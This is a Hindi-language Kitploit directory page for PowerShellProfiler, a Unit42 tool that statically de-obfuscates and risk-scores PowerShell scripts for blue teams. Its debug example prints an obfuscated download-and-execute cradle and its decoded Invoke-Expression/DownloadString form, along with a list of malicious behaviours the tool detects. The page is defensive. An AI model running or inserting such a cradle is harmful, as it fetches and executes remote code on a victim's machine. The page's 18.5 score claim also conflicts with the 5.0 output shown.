Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PowerShellProfiler — PowerShellProfiler | Kitploit
उपकरण/GitHubGitHub/al1ex/powershellprofiler
Static AnalysisCode AnalysisReverse EngineeringForensicsMalware Analysis
GitHubal1ex/powershellprofiler

PowerShellProfiler

PowerShellProfiler

रिपॉजिटरी देखें
25 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PowerShellProfiler

यह प्रोजेक्ट कोड https://github.com/pan-unit42/public_tools/tree/master/powershellprofiler से है।

परिचय

PowerShellProfiler.py एक स्क्रिप्ट है जो PowerShell स्क्रिप्ट्स का स्थैतिक विश्लेषण करती है, सामग्री को डी-ऑबफस्केट और सामान्यीकृत करके, जिसे फिर व्यवहारिक संकेतकों के लिए प्रोफाइल किया जाता है। इन व्यवहारों को स्कोर किया जाता है और स्कोर का कुल योग PowerShell स्क्रिप्ट के लिए संभावित जोखिम स्तर प्रदान करता है। इसे PowerShell स्क्रिप्ट्स के थोक विश्लेषण से निपटने का एक व्यावहारिक तरीका उजागर करने और नीली टीमों को विश्लेषण को गति देने के लिए एक और उपकरण देकर सहायता करने के लिए बनाया गया था।

Unit42 ब्लॉग श्रृंखला - "Practical Behavioral Profiling of PowerShell Scripts through Static Analysis" में यह PowerShell स्क्रिप्ट्स के भीतर व्यवहारों की स्थैतिक प्रोफाइलिंग के इस दृष्टिकोण की अवधारणा, डिज़ाइन और फायदे/नुकसान को शामिल करता है।

root@kitploit:~
usage: PowerShellProfiler.py [-h] -f <file_name> [-d]

PowerShellProfiler analyzes PowerShell scripts statically to identify and
score behaviors.

optional arguments:
  -h, --help            show this help message and exit
  -f <file_name>, --file <file_name>
                        PowerShell Script to behaviorally profile
  -d, --debug           Enables debug output

आउटपुट परिणाम

मानक उपयोग काफी सीधा है। बस "-f" फ्लैग का उपयोग करके एक फ़ाइल नाम (PowerShell स्क्रिप्ट, ScriptBlock Log Export, टेक्स्ट फ़ाइल, आदि) पास करें और PowerShellProfiler.py स्क्रिप्ट परिणाम आउटपुट कर देगी।

root@kitploit:~
C:\Users\Al1ex\Desktop\PowerShellProfiler>python3 PowerShellProfiler.py -f C:\Users\Al1ex\Desktop\Powershell\1.ps1
C:\Users\Al1ex\Desktop\Powershell\1.ps1 , 5.0 , Mild Risk , 0:00:00.008002 , [Downloader - 1.5 | Script Execution - 1.5 | One Liner - 2.0]

standard

आउटपुट अल्पविराम-सीमांकित होता है और निम्नलिखित फ़ील्ड्स का उपयोग करता है:

root@kitploit:~
File Name , Profiling Score , Proposed Risk Level , Analysis Runtime , Behaviors (pipe-delimited)

इस मामले में, फ़ाइल "1.ps1" में ऐसी विशेषताएँ/व्यवहार पाए गए जो सुझाव देते हैं कि स्क्रिप्ट सामग्री डाउनलोड करने, प्रोसेस शुरू करने, अतिरिक्त स्क्रिप्ट सामग्री निष्पादित करने, संपीड़न का उपयोग करने, कुछ प्रकार की सिस्टम जानकारी एकत्र करने में सक्षम है, पूरी स्क्रिप्ट एक-लाइन में फिट होती है, और ऐसे पैटर्न हैं जो ज्ञात मैलवेयर परिवार "Veil" से मेल खाते हैं। इन व्यवहारों को अलग-अलग स्कोर किया जाता है और ये कुल 18.5 होते हैं, जो उच्चतम जोखिम की सीमा में है।

इसके अतिरिक्त, "-d" फ्लैग के साथ एक "debug" मोड होता है जो असफल डिकोडिंग/डीऑबफस्केशन, लंबे रन टाइम, नए व्यवहारों के लिए डिकोड की गई सामग्री का विश्लेषण, और सामान्यतः अधिक विस्तृत आउटपुट के समस्या निवारण के लिए उपयोगी है।

root@kitploit:~
C:\Users\Al1ex\Desktop\PowerShellProfiler>python3 PowerShellProfiler.py -d -f C:\Users\Al1ex\Desktop\Powershell\1.ps1
Opened File C:\Users\Al1ex\Desktop\Powershell\1.ps1
[+] Normalization Function
        [!] Format Replaced - True: 0:00:00.000997
        [!] Format Replaced - True: 0:00:00
[+] Normalization Function
[+] Normalization Function


##### TIMING / MATCH #####

Main Processing: 0:00:00.003988
Family ID: 0:00:00.001995
Behavior Check - Code Injection: 0:00:00
Behavior Check - Key Logging: 0:00:00
Behavior Check - Screen Scraping: 0:00:00
Behavior Check - AppLocker Bypass: 0:00:00
Behavior Check - AMSI Bypass: 0:00:00
Behavior Check - Clear Logs: 0:00:00
Behavior Check - Coin Miner: 0:00:00
Behavior Check - Embedded File: 0:00:00
Behavior Check - Abnormal Size: 0:00:00
Behavior Check - Ransomware: 0:00:00
Behavior Check - DNS C2: 0:00:00
Behavior Check - Disabled Protections: 0:00:00
Behavior Check - Negative Context: 0:00:00
['DownloadString']
Behavior Check - Downloader: 0:00:00
Behavior Check - Starts Process: 0:00:00
['Invoke-Expression']
Behavior Check - Script Execution: 0:00:00
Behavior Check - Compression: 0:00:00
Behavior Check - Hidden Window: 0:00:00
Behavior Check - Custom Web Fields: 0:00:00
Behavior Check - Persistence: 0:00:00
Behavior Check - Sleeps: 0:00:00
Behavior Check - Uninstalls Apps: 0:00:00
Behavior Check - Obfuscation: 0:00:00
Behavior Check - Crypto: 0:00:00
Behavior Check - Enumeration: 0:00:00
Behavior Check - Registry: 0:00:00
Behavior Check - Sends Data: 0:00:00
Behavior Check - Byte Usage: 0:00:00
Behavior Check - SysInternals: 0:00:00
Behavior Check - One Liner: 0:00:00
Behavior Check - Variable Extension: 0:00:00
Behavior Check - Script Logging: 0:00:00
Behavior Check - License: 0:00:00
Behavior Check - Function Body: 0:00:00
Behavior Check - Positive Context: 0:00:00
Behavior ID: 0:00:00.010971
C:\Users\Al1ex\Desktop\Powershell\1.ps1 , 5.0 , Mild Risk , 0:00:00.018915 , [Downloader - 1.5 | Script Execution - 1.5 | One Liner - 2.0]


##### ORIGINAL SCRIPT #####

.("{4}{1}{0}{2}{3}" -f 'Express','-','io','n','Invoke') (&("{2}{0}{3}{1}"-f 'e','-Object','N','w') System.Net.WebClient).DownloadString("http://127.0.0.1:4444/Al1ex.txt")

##### ALTERED SCRIPT #####

."Invoke-Expression" (&"New-Object" System.Net.WebClient).DownloadString("http://127.0.0.1:4444/Al1ex.txt")

C:\Users\Al1ex\Desktop\PowerShellProfiler>

debug

टूल डाउनलोड करें